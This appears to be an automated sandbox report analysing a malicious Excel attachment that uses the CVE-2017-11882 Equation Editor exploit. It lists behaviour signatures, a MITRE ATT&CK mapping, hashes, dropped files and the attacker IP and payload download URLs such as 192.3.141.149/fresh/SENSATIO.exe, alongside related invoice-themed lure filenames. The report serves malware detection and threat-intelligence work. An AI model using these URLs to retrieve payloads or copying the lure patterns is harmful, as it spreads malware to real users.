    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2816Thread sleep time: -360000s >= -30000s
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A8A83 rdtsc
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A8A83 rdtsc
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004027C4 mov ebx, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A863C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A946C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A5E70 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A3271 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A3E5E mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A0E8E mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A3ACB mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A3B26 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A7F4E mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A91AB mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002A0BA2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: vbc.exe, 00000006.00000002.691215980.0000000000840000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: vbc.exe, 00000006.00000002.691215980.0000000000840000.00000002.00020000.sdmpBinary or memory string: !Progman
    Source: vbc.exe, 00000006.00000002.691215980.0000000000840000.00000002.00020000.sdmpBinary or memory string: Program Manager<

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsExploitation for Client Execution12Path InterceptionProcess Injection12Masquerading111OS Credential DumpingSecurity Software Discovery11Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsExtra Window Memory Injection1Virtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol121SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    70A and 90A, quantity 20000 tons.xlsx31%VirustotalBrowse
    70A and 90A, quantity 20000 tons.xlsx31%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SENSATIO[1].exe21%VirustotalBrowse
    C:\Users\Public\vbc.exe21%VirustotalBrowse

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://192.3.141.149/fresh/SENSATIO.exe10%VirustotalBrowse
    http://192.3.141.149/fresh/SENSATIO.exe0%Avira URL Cloudsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://192.3.141.149/fresh/SENSATIO.exetrue
    • 10%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkvbc.exe, 00000006.00000002.692357733.00000000028C7000.00000002.00020000.sdmpfalse
      high
      http://www.icra.org/vocabulary/.vbc.exe, 00000006.00000002.692357733.00000000028C7000.00000002.00020000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://windowsmedia.com/redir/services.asp?WMPFriendly=truevbc.exe, 00000006.00000002.692357733.00000000028C7000.00000002.00020000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://www.day.com/dam/1.096D57846.emf.0.drfalse
        high

        Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public

        IPDomainCountryFlagASNASN NameMalicious
        192.3.141.149
        unknownUnited States
        36352AS-COLOCROSSINGUStrue

        General Information

        Joe Sandbox Version:33.0.0 White Diamond
        Analysis ID:483688
        Start date:15.09.2021
        Start time:11:36:53
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 6m 21s
        Hypervisor based Inspection enabled:false
        Report type:light
        Sample file name:70A and 90A, quantity 20000 tons.xlsx
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:7
        Number of new started drivers analysed:2
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal100.troj.expl.winXLSX@4/21@0/1
        EGA Information:Failed
        HDC Information:
        • Successful, ratio: 44.9% (good quality ratio 23.5%)
        • Quality average: 26.4%
        • Quality standard deviation: 31.6%
        HCA Information:Failed
        Cookbook Comments:
        • Adjust boot time
        • Enable AMSI
        • Found application associated with file extension: .xlsx
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer
        Warnings:
        Show All
        • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, svchost.exe
        • TCP Packets have been reduced to 100
        • Report size getting too big, too many NtCreateFile calls found.
        • Report size getting too big, too many NtQueryAttributesFile calls found.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        11:37:47API Interceptor38x Sleep call for process: EQNEDT32.EXE modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        192.3.141.149proforma invoice.xlsxGet hashmaliciousBrowse
        • 192.3.141.149/Shinikor/SHINIKOR.exe
        Invoice Scan Copy.xlsxGet hashmaliciousBrowse
        • 192.3.141.149/monday/bin.exe
        LOI _FOB$$ #NEW STEEL DRUM 082021.xlsxGet hashmaliciousBrowse
        • 192.3.141.149/fresh/bin.exe
        Payment Swift ref. 0000378062021.xlsxGet hashmaliciousBrowse
        • 192.3.141.149/xpay/BIN.exe
        MT 130,000 BW SEAGRACE DOCUMENTS.xlsxGet hashmaliciousBrowse
        • 192.3.141.149/xpay/BIN.exe

        Domains

        No context

        ASN

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        AS-COLOCROSSINGUSRemittance_Advice_details001009142021.xlsxGet hashmaliciousBrowse
        • 107.173.219.122
        ORDER CONFIRMATION.xlsxGet hashmaliciousBrowse
        • 198.23.212.143
        Pedido.xlsxGet hashmaliciousBrowse
        • 172.245.26.190
        #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsxGet hashmaliciousBrowse
        • 23.95.85.181
        09142021_PDF.vbsGet hashmaliciousBrowse
        • 23.94.82.41
        Swift Mt103.xlsxGet hashmaliciousBrowse
        • 23.95.13.175
        vkb.xlsxGet hashmaliciousBrowse
        • 192.3.13.11
        Transfer Swift.xlsxGet hashmaliciousBrowse
        • 172.245.26.190
        ORDER 5172020.xlsxGet hashmaliciousBrowse
        • 198.12.84.109
        REF_MIDLGB34.xlsxGet hashmaliciousBrowse
        • 23.94.159.208
        proforma invoice.xlsxGet hashmaliciousBrowse
        • 192.3.141.149
        Swift_Mt103.xlsxGet hashmaliciousBrowse
        • 23.95.13.175
        PO-80722 .xlsxGet hashmaliciousBrowse
        • 198.12.84.109
        MT103-Swift Copy.xlsxGet hashmaliciousBrowse
        • 198.46.199.203
        Items_quote.xlsxGet hashmaliciousBrowse
        • 172.245.26.145
        Usd_transfer.xlsxGet hashmaliciousBrowse
        • 172.245.26.145
        REF_MIDLGB34.xlsxGet hashmaliciousBrowse
        • 23.94.159.208
        ORDER RFQ1009202.xlsxGet hashmaliciousBrowse
        • 23.95.85.181
        msn.xlsxGet hashmaliciousBrowse
        • 198.12.127.217
        swift.xlsxGet hashmaliciousBrowse
        • 198.46.199.171

        JA3 Fingerprints

        No context

        Dropped Files

        No context

        Created / dropped Files

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SENSATIO[1].exe
        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
        Category:downloaded
        Size (bytes):114688
        Entropy (8bit):5.8596280022112595
        Encrypted:false
        SSDEEP:1536:W+u85vTXEEX5wkjFXW8sBM2dIaK4AUpdQANZ2ftq82Pkl2dp5JT:JvTUE+8sBrdMUpdNwwv62VJT
        MD5:C10CEF2B31864B5F9FB13B9AF78765B2
        SHA1:3E76E8C204098C1B52B78508286A962C35E637FE
        SHA-256:6E85C6CFE631FEEF7D11250670EFCBAF476886D8EE13D11A8873CC5DF84A14F9
        SHA-512:9531703F2320855B764F46E69372BB2AD5E10A5148BFABD087A89A4771B6F8129B3A9DB68CFABE047458E89F6C2711372E2D39E7DB40C43D709D36A6940DD397
        Malicious:true
        Antivirus:
        • Antivirus: Virustotal, Detection: 21%, Browse
        Reputation:low
        IE Cache URL:http://192.3.141.149/fresh/SENSATIO.exe
        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L......N.................`...P...............p....@.............B...................-........................................f..(........1..................................................................(... .......X............................text....[.......`.................. ..`.data...4....p.......p..............@....rsrc....1.......@..................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\22171F76.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
        Category:dropped
        Size (bytes):7006
        Entropy (8bit):7.000232770071406
        Encrypted:false
        SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
        MD5:971312D4A6C9BE9B496160215FE59C19
        SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
        SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
        SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\242116F2.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
        Category:dropped
        Size (bytes):14198
        Entropy (8bit):7.916688725116637
        Encrypted:false
        SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
        MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
        SHA1:72CA86D260330FC32246D28349C07933E427065D
        SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
        SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\359F0903.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
        Category:dropped
        Size (bytes):49744
        Entropy (8bit):7.99056926749243
        Encrypted:true
        SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
        MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
        SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
        SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
        SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4274964B.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
        Category:dropped
        Size (bytes):49744
        Entropy (8bit):7.99056926749243
        Encrypted:true
        SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
        MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
        SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
        SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
        SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\43B9CFF.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):84203
        Entropy (8bit):7.979766688932294
        Encrypted:false
        SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
        MD5:208FD40D2F72D9AED77A86A44782E9E2
        SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
        SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
        SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
        Malicious:false
        Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AB49AC7.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):84203
        Entropy (8bit):7.979766688932294
        Encrypted:false
        SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
        MD5:208FD40D2F72D9AED77A86A44782E9E2
        SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
        SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
        SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
        Malicious:false
        Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5E397F75.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
        Category:dropped
        Size (bytes):8815
        Entropy (8bit):7.944898651451431
        Encrypted:false
        SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
        MD5:F06432656347B7042C803FE58F4043E1
        SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
        SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
        SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
        Malicious:false
        Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\627B9191.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):6815
        Entropy (8bit):7.871668067811304
        Encrypted:false
        SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
        MD5:E2267BEF7933F02C009EAEFC464EB83D
        SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
        SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
        SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
        Malicious:false
        Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\736F2A5E.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
        Category:dropped
        Size (bytes):7006
        Entropy (8bit):7.000232770071406
        Encrypted:false
